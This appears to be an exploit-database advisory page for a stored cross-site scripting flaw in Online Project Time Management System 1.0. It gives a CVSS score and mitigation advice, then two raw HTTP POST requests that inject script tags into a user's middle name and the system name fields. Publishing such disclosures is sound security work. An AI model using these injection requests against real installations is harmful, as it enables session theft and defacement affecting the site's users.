header-logo
Suggest Exploit
vendor:
Online Project Time Management System
by:
Felipe Alcantara (Filiplain)
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Online Project Time Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:online_project_time_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2022

Online Project Time Management System 1.0 – Multiple Stored XSS (Authenticated)

Online Project Time Management System 1.0 is vulnerable to multiple stored XSS attacks when an authenticated user adds XSS payload to any field of the user's name. An attacker can exploit this vulnerability by logging in as an employee, going to http://localhost/ptms/?page=user, adding XSS payload to any field of the user's name and clicking Update.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize user input and encode output to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...

# Steps to reproduce (with employee Access)

# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Add XSS payload to any field of the user's name.
#Click Update


=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"

Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"

<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================

-----------------------------------------------------------------------------

# Steps to reproduce (with Admin access)

# Log in to the admin panel
# Go to : http://localhost/ptms/admin/?page=system_info
# Add XSS payload to the 'System Name' field
#Click Update


=================

POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"

Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"

PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq--

=================